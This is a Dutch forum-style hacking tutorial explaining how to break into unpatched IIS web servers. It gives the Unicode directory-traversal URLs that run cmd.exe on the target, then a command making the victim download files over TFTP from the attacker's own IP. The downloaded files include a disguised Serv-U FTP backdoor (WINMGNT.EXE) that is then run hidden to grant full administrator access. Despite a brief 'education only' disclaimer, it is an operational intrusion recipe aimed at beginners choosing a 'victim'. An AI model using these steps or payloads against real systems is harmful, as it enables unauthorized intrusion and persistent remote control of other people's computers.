H4CK.NL
Home > Tutorials > Hacking > Computer binnen dringen

Gebruikersnaam
Wachtwoord vergeten
Wachtwoord
Onthoud Gebruiker  

Computer binnen dringen

Dit is alleen voor educatie doeleinden geschreven en aan admins te laten zien hoe makkelijk het kan zijn om een systeem binnen te dringen, zelfs voor n00bs. Zorg dan ook voor een goede beveiliging.

Dit is een tutorial die ik een tijd geleden heb geschreven maybe hebben jullie er wat aan, als het niet gewenst is delete hem dan maar meteen ^_^.

Dingen die je nodig hebt:

- Accesdriver (http://www.accessdiver.com)
- Internet Explorer
- skhack.zip (zoek via www.google.com)
- FlashFXP of iets dergelijks (www.download.com)
- TFTP server (search www.google.com)
- Een victim (een IIS server dus die onbeveiligt is)
- Serv-u (om de ftp op te zetten voor root access)

Begin:

1. Extract skhack.zip in c:\ftp\
2. Installeer: Accesdriver, FlashFXP, TFTP server en serv-u
3. Copy the servudaemon.ini vanuit de c:\ftp\ naar waar je serv-u hebt geinstalleerd en overwrite de file.

Serv-u

1. Dubbel klik local servers, klik dan op Domains, dan op ftp.
2. Hier kan je instellen op welke port je de ftp.
3. Ga dan naar USERS en doe rechtermuisknop doe new user. Neem een l/p. Neem de c:\ als start dir. En doe no lock users.
4. Nu krijg je setup user, en klik System Admin. Voor de rest kan je nog wat dingen instellen.
5. Doe nu apply en copy de servudaemon.ini weer terug van de serv-u dir naar c:\ftp\

TFTP server

1. Zorg bij de instellingen dat de inbound en outbound pathfile allebij c:\ftp\ is.

Accessdriver

1. Zet hem in als exploiter (hit my skill > exploiter)
2. Click op het foldertje en import de IIS.ini uit c:\ftp\
3. Bovenin vul je je victim in als "http://127.0.0.1/" (zonder "").
4. Druk op start.
5. Als ie klaar is met scannen en er zit een 502 tussen dat is ie "hackbaar" anders moet je een ander victim (ander ip) nemen voordat je verder kan.
6. Als je er een 502 tussenzit klik erop. Je hebt dan een path als http://127.0.0.1/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\

7. Dit is de unicode: /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\

8. Dit is part 1 van de unicode: /scripts/..%%35%63..%%35%63 (eindigt altijd waar winnt begint)

9. Dit is part 2 van de unicode: winnt/system32/cmd.exe?/c+dir+c:\

10. Zorg dat je tftp server draait.
11. Typ dit in je explorer: http://127.0.0.1/UNICODEPART1winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+jouweigenip+get+WINMGNT.EXE+c:\WINMGNT.EXE

12. Zorg dat waar "jouweigenip" staat ook je ip staat. Weet je niet wat je ip is (www.whatismyip.com)

13. Druk enter, en check in je TFTP server of je activiteit ziet, als het goed is zie je een progress bar en word WINMGNT.EXE geupload.

14. Herhaal dit voor: kill.exe, tlist.exe, winlogin.exe en servudaemon.ini

15. Als ze upgeload zijn typ dit in explorer: http://127.0.0.1/UNICODEPART1winnt/system32/cmd.exe?/c+c:\WINMGNT.EXE%20/h

16. Test het met FlashFXP door in te loggen met ip en l/p.

17. Als alles gelukt is heb je nu alle controle over de pc. Je hebt eindelijk root access ^_^.

18. Je kan met serv-u nog van alles instellen zoals meer users enz maar daar gaat deze tuto niet over.

h4ck.nl
Rated 9/10 based on 714 reviews

Je kan je eigen review plaatsen als je lid bent.

Â